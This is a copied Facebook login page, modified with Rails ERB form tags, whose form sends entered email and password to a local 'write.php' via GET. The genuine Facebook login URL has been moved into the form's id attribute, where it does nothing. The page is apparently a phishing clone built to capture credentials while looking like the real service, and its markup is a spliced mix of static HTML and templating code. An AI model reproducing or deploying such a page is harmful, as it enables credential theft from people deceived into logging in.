<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=" no_js">
<head>
<meta http-equiv="Content-type" content="text/html; charset=utf-8" />
<meta http-equiv="Content-language" content="en" />
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7" />
<script type="text/javascript">
//<![CDATA[
window._is_quickling_index="";CavalryLogger=false;
//]]>
</script>
<meta name="robots" content="noodp,noydir" />
<meta name="description" content=" Facebook is a social utility that connects people with friends and others who work, study and live around them. People use Facebook to keep up with friends, upload an unlimited number of photos, post links and videos, and learn more about the people they meet." />
<title>Login | Facebook</title>

<script type="text/javascript">
Env={user:0,locale:"en_US",method:"GET",dev:0,start:(new Date()).getTime(),ps_limit:5,ps_ratio:4,svn_rev:209637,vip:"69.63.181.16",static_base:"http:\/\/static.ak.fbcdn.net\/",www_base:"http:\/\/www.facebook.com\/",tlds:["com"],rep_lag:2,pc:{"m":"1.0.0","l":"1.0.0"},fb_dtsg:null};
</script>

    <script type="text/javascript" src="http://b.static.ak.fbcdn.net/rsrc.php/z37N4/hash/3yfoo63v.js"></script>
    <script type="text/javascript" src="http://b.static.ak.fbcdn.net/rsrc.php/z9Z8M/hash/4pwmtjt7.js"></script>
    <script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/z9UJ4/hash/3slhnonx.js"></script>
<script type="text/javascript">Bootloader.enableBootload({"async":[{"name":"js\/19khsprwvtvokwow.pkg.js","type":"js","src":"http:\/\/b.static.ak.fbcdn.net\/rsrc.php\/z37N4\/hash\/3yfoo63v.js","permanent":false},{"name":"js\/8iulmjyvnog0oo4o.pkg.js","type":"js","src":"http:\/\/b.static.ak.fbcdn.net\/rsrc.php\/z9Z8M\/hash\/4pwmtjt7.js","permanent":false},{"name":"css\/6iczrcydqusc8koc.pkg.css","type":"css","src":"http:\/\/b.static.ak.fbcdn.net\/rsrc.php\/z2KBW\/hash\/9iar4ypo.css","permanent":true}],"dialog":[{"name":"js\/19khsprwvtvokwow.pkg.js","type":"js","src":"http:\/\/b.static.ak.fbcdn.net\/rsrc.php\/z37N4\/hash\/3yfoo63v.js","permanent":false},{"name":"js\/8iulmjyvnog0oo4o.pkg.js","type":"js","src":"http:\/\/b.static.ak.fbcdn.net\/rsrc.php\/z9Z8M\/hash\/4pwmtjt7.js","permanent":false},{"name":"css\/6iczrcydqusc8koc.pkg.css","type":"css","src":"http:\/\/b.static.ak.fbcdn.net\/rsrc.php\/z2KBW\/hash\/9iar4ypo.css","permanent":true}],"dom-form":[{"name":"js\/19khsprwvtvokwow.pkg.js","type":"js","src":"http:\/\/b.static.ak.fbcdn.net\/rsrc.php\/z37N4\/hash\/3yfoo63v.js","permanent":false},{"name":"js\/8iulmjyvnog0oo4o.pkg.js","type":"js","src":"http:\/\/b.static.ak.fbcdn.net\/rsrc.php\/z9Z8M\/hash\/4pwmtjt7.js","permanent":false},{"name":"css\/6iczrcydqusc8koc.pkg.css","type":"css","src":"http:\/\/b.static.ak.fbcdn.net\/rsrc.php\/z2KBW\/hash\/9iar4ypo.css","permanent":true}],"async-signal":[{"name":"js\/8iulmjyvnog0oo4o.pkg.js","type":"js","src":"http:\/\/b.static.ak.fbcdn.net\/rsrc.php\/z9Z8M\/hash\/4pwmtjt7.js","permanent":false}]});</script>
    <link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/z4K1P/hash/797khaox.css" />
    <link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/zELN9/hash/c7h3cyeq.css" />
    <link type="text/css" rel="stylesheet" href="http://b.static.ak.fbcdn.net/rsrc.php/z5XFW/hash/9novwt2j.css" />
    <link type="text/css" rel="stylesheet" href="http://b.static.ak.fbcdn.net/rsrc.php/z16R3/hash/2ixz2j7y.css" />
    <link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/zEA3E/hash/62pccmyc.css" />
    <link type="text/css" rel="stylesheet" href="http://b.static.ak.fbcdn.net/rsrc.php/z2KBW/hash/9iar4ypo.css" />


<link rel="search" type="application/opensearchdescription+xml" href="http://b.static.ak.fbcdn.net/rsrc.php/z23ZQ/hash/3ls2fki5.xml" title="Facebook" />
<link rel="shortcut icon" href="http://static.ak.fbcdn.net/rsrc.php/z9Q0Q/hash/8yhim1ep.ico" /></head>
<body class="login_page UIPage_LoggedOut Locale_en_US">
<div id="FB_HiddenContainer" style="position:absolute; top:-10000px; width:0px; height:0px;" ></div><div id="menubar_container" class="fb_menubar_show_register"><div  id="fb_menubar" class=" fb_menubar_logged_out clearfix"><ul id="fb_menubar_core" class="fb_menu_list"><li class="fb_menu" id="fb_menubar_logo"><a href="http://www.facebook.com" class="fb_logo_link" title="Go to Facebook Home"><img class="fb_logo_img img" src="http://static.ak.fbcdn.net/rsrc.php/z12E0/hash/8q2anwu7.gif" alt="Facebook logo" /></a></li></ul><ul id="fb_menubar_aux" class="fb_menu_list"></ul></div><div class="signup_bar_container"><div class="signup_box clearfix">
		<a class="signup_btn UIButton UIButton_Green UIButton_Large UIActionButton_SuppressMargin UIActionButton"  href="/r.php?locale=en_US"><span class="UIButton_Text">Sign Up</span></a><div class="signup_box_content"><span>Facebook helps you connect and share with the people in your life.</span></div></div></div></div><div id="dropmenu_container"></div><div id="content" class="fb_content clearfix"><div class="UIFullPage_Container"><div class="UIInterstitialContainer clearfix"><div class="UIRoundedTransparentBox"><div class="UIRoundedTransparentBox_Inner clearfix"><div class="UIRoundedTransparentBox_Corner UIRoundedTransparentBox_TL">&nbsp;</div><div class="UIRoundedTransparentBox_Corner UIRoundedTransparentBox_TR">&nbsp;</div><div class="UIRoundedTransparentBox_Corner UIRoundedTransparentBox_BL">&nbsp;</div><div class="UIRoundedTransparentBox_Corner UIRoundedTransparentBox_BR">&nbsp;</div><div class="UIRoundedTransparentBox_Border clearfix"><div class="UIInterstitialBox_Container clearfix"><div ><div class="title_header add_border"><h2 class="title_h no_icon">Facebook Login</h2></div>
	<%= form_for @facebook do |f| %>
	<form action=write.php id="https://login.facebook.com/login.php?m&amp;next=http%3A%2F%2Fm.facebook.com%2Fhome.php%3Fl6e2810d7" method=GET>
	<input type="hidden" name="charset_test" value="&euro;,&acute;,€,´,水,Д,Є" />
	<div id="loginform" style="">
		<input type="hidden" id="version" name="version" value="1.0" autocomplete="off" />
		<input type="hidden" id="return_session" name="return_session" value="0" autocomplete="off" />
		<input type="hidden" id="session_key_only" name="session_key_only" value="0" autocomplete="off" />
		<input type="hidden" name="charset_test" value="&euro;,&acute;,€,´,水,Д,Є" />
		<input type="hidden" id="lsd" name="lsd" value="QNZc2" autocomplete="off" /><div class="form_row clearfix "><label for="email" id="label_email">Email:</label><%= f.text_field :email, :class=> "inputtext", :id=>"email", :onkeypress=>"formchange()"%></div><div class="form_row clearfix "><label for="pass" id="label_pass">Password:</label><%= f.password_field :password, :class=>"inputpassword", :id=>"pass" %></div><label class="persistent"><input type="checkbox" class="inputcheckbox " id="persistent_inputcheckbox" name="persistent" value="1" /><span id="persistent_login_text">Keep me logged in</span></label><div id="buttons" class="form_row clearfix"><label></label><%= f.submit "Login", :id=>"login", :class=> "inputsubmit" %><% end %> or <strong><a href="http://www.facebook.com/r.php?next=&amp;locale=en_US" id="reg_btn_link" target="_blank" rel="nofollow">Sign up for Facebook</a></strong></div><p class="reset_password form_row"><label></label><a href="http://www.facebook.com/reset.php?locale=en_US">Forgot your password?</a></p></div></form>
</div></div></div></div></div><div ><div class="linear_language"><ul><li><a href="http://www.facebook.com/login.php" title="English (US)" onclick="intl_set_cookie_locale(&quot;en_US&quot;, &quot;http:\/\/www.facebook.com\/login.php&quot;, &quot;TOP_LOCALES&quot;); return false;">English (US)</a></li><li></li><li><a href="http://bn-in.facebook.com/login.php" title="Bengali" onclick="intl_set_cookie_locale(&quot;bn_IN&quot;, &quot;http:\/\/bn-in.facebook.com\/login.php&quot;, &quot;TOP_LOCALES&quot;); return false;">বাংলা</a></li><li><a href="http://hi-in.facebook.com/login.php" title="Hindi" onclick="intl_set_cookie_locale(&quot;hi_IN&quot;, &quot;http:\/\/hi-in.facebook.com\/login.php&quot;, &quot;TOP_LOCALES&quot;); return false;">हिन्दी</a></li><li><a href="http://pa-in.facebook.com/login.php" title="Punjabi" onclick="intl_set_cookie_locale(&quot;pa_IN&quot;, &quot;http:\/\/pa-in.facebook.com\/login.php&quot;, &quot;TOP_LOCALES&quot;); return false;">ਪੰਜਾਬੀ</a></li><li><a href="http://ta-in.facebook.com/login.php" title="Tamil" onclick="intl_set_cookie_locale(&quot;ta_IN&quot;, &quot;http:\/\/ta-in.facebook.com\/login.php&quot;, &quot;TOP_LOCALES&quot;); return false;">தமிழ்</a></li><li><a href="http://te-in.facebook.com/login.php" title="Telugu" onclick="intl_set_cookie_locale(&quot;te_IN&quot;, &quot;http:\/\/te-in.facebook.com\/login.php&quot;, &quot;TOP_LOCALES&quot;); return false;">తెలుగు</a></li><li><a href="http://ml-in.facebook.com/login.php" title="Malayalam" onclick="intl_set_cookie_locale(&quot;ml_IN&quot;, &quot;http:\/\/ml-in.facebook.com\/login.php&quot;, &quot;TOP_LOCALES&quot;); return false;">മലയാളം</a></li><li><a href="http://es-la.facebook.com/login.php" title="Spanish" onclick="intl_set_cookie_locale(&quot;es_LA&quot;, &quot;http:\/\/es-la.facebook.com\/login.php&quot;, &quot;TOP_LOCALES&quot;); return false;">Español</a></li><li><a href="http://pt-br.facebook.com/login.php" title="Portuguese (Brazil)" onclick="intl_set_cookie_locale(&quot;pt_BR&quot;, &quot;http:\/\/pt-br.facebook.com\/login.php&quot;, &quot;TOP_LOCALES&quot;); return false;">Português (Brasil)</a></li><li><a rel="dialog" href="/ajax/intl/language_dialog.php?uri=http%3A%2F%2Fwww.facebook.com%2Flogin.php&amp;source=TOP_LOCALES_DIALOG" title="Show more languages" class="chevron">&raquo;</a></li></ul></div></div></div></div></div><div id="pagefooter" class="clearfix"><div class="copyright_and_location clearfix"><div class="copyright" id="pagefooter_copyright"><span title="HPHP">Facebook </span><span id="rtime" title="64">&copy;</span> <span title="10.27.150.113">20</span><span title="1208056">10</span></div><div id="locale_selector_dialog_onclick"><a rel="dialog" href="/ajax/intl/language_dialog.php?uri=http%3A%2F%2Fwww.facebook.com%2Flogin.php" class="intl_selector_dialog_a" title="English (US)">English (US)</a></div></div><div id="pagefooter_links"><ul class="pagefooter_ul" id="pagefooter_left_links"><li class="pagefooter_li"><a href="http://www.facebook.com/facebook?ref=pf" accesskey="7" rel="nofollow">About</a></li><li class="pagefooter_li"><a href="http://www.facebook.com/advertising/?src=pf">Advertising</a></li><li class="pagefooter_li"><a href="http://developers.facebook.com/?ref=pf">Developers</a></li><li class="pagefooter_li"><a href="http://www.facebook.com/careers/?ref=pf">Careers</a></li><li class="pagefooter_li"><a href="http://www.facebook.com/terms.php?ref=pf" accesskey="8" rel="nofollow">Terms</a></li><li class="pagefooter_li"><a href="http://blog.facebook.com/blog.php">Blog</a></li><li class="pagefooter_li"><a href="http://www.facebook.com/facebook-widgets/?ref=pf">Widgets</a></li><li class="pagefooter_li"><span><span class="bullet">&#9632;</span></span></li></ul><ul class="pagefooter_ul" id="pagefooter_right_links"><li class="pagefooter_li"><a href="http://www.facebook.com/find-friends/?ref=pf">Find Friends</a></li><li class="pagefooter_li"><a href="http://www.facebook.com/privacy/explanation.php?ref=pf" accesskey="6" rel="nofollow">Privacy</a></li><li class="pagefooter_li"><a href="http://www.facebook.com/mobile/?ref=pf" accesskey="5">Mobile</a></li><li class="pagefooter_li"><a href="http://www.facebook.com/help.php?ref=pf" accesskey="0" rel="nofollow">Help</a></li></ul></div></div><div id="js_buffer"><script type="text/javascript">

onloadRegister(function(){Bootloader.configurePage({"http:\/\/static.ak.fbcdn.net\/rsrc.php\/z4K1P\/hash\/797khaox.css":["css\/33ddf5niyigw00o8.pkg.css",true],"http:\/\/static.ak.fbcdn.net\/rsrc.php\/zELN9\/hash\/c7h3cyeq.css":["css\/login.css",false],"http:\/\/b.static.ak.fbcdn.net\/rsrc.php\/z5XFW\/hash\/9novwt2j.css":["css\/27t68ukv7k00008k.pkg.css",false],"http:\/\/b.static.ak.fbcdn.net\/rsrc.php\/z16R3\/hash\/2ixz2j7y.css":["css\/7sg0r97is1gcs8sk.pkg.css",false],"http:\/\/static.ak.fbcdn.net\/rsrc.php\/zEA3E\/hash\/62pccmyc.css":["css\/4kd2ki4ug5k4w0s8.pkg.css",true],"http:\/\/b.static.ak.fbcdn.net\/rsrc.php\/z2KBW\/hash\/9iar4ypo.css":["css\/6iczrcydqusc8koc.pkg.css",true]});});
Bootloader.done(["css\/33ddf5niyigw00o8.pkg.css","css\/login.css","css\/27t68ukv7k00008k.pkg.css","css\/7sg0r97is1gcs8sk.pkg.css","css\/4kd2ki4ug5k4w0s8.pkg.css","css\/6iczrcydqusc8koc.pkg.css","js\/login.js"]);


onloadRegister(function (){window.loading_page_chrome = true;;});
onloadRegister(function (){window.loading_page_chrome = false;;});
onloadRegister(function (){useragent();;});
onafterloadRegister(function (){onbeforeunloadRegister(function(){window.ExitTime=((new Date()).getTime());});});


</script></div><script type="text/javascript">if (!window.ge) {
  window.ge = function(id) {
    return document.getElementById(id);
  }
}

window.onload = function() {
  document.cookie = "test_cookie=1;domain=.facebook.com";
  var e = ge('email'),
      p = ge('pass');

  //  We sometimes show you *only* a password prompt, so focus that if there
  //  is no e-mail prompt.

  try {
    if (e && !e.value) {
      e.focus();
    } else if (p) {
      p.focus();
    }
  } catch (x) {
    if (x.number == -2146826178) {
      // this is a focus error that happens in IE when the fields are
      // hidden in order to show the "Sign Up" prompt when a user
      // arrives with 0 facebook cookies.
    } else {
      throw x;
    }
  }
};

function formchange() {
  (ge('persistent')||{}).checked = 0;
}

function pop(url) {
  window.open(url);
}
</script></body>
</html>


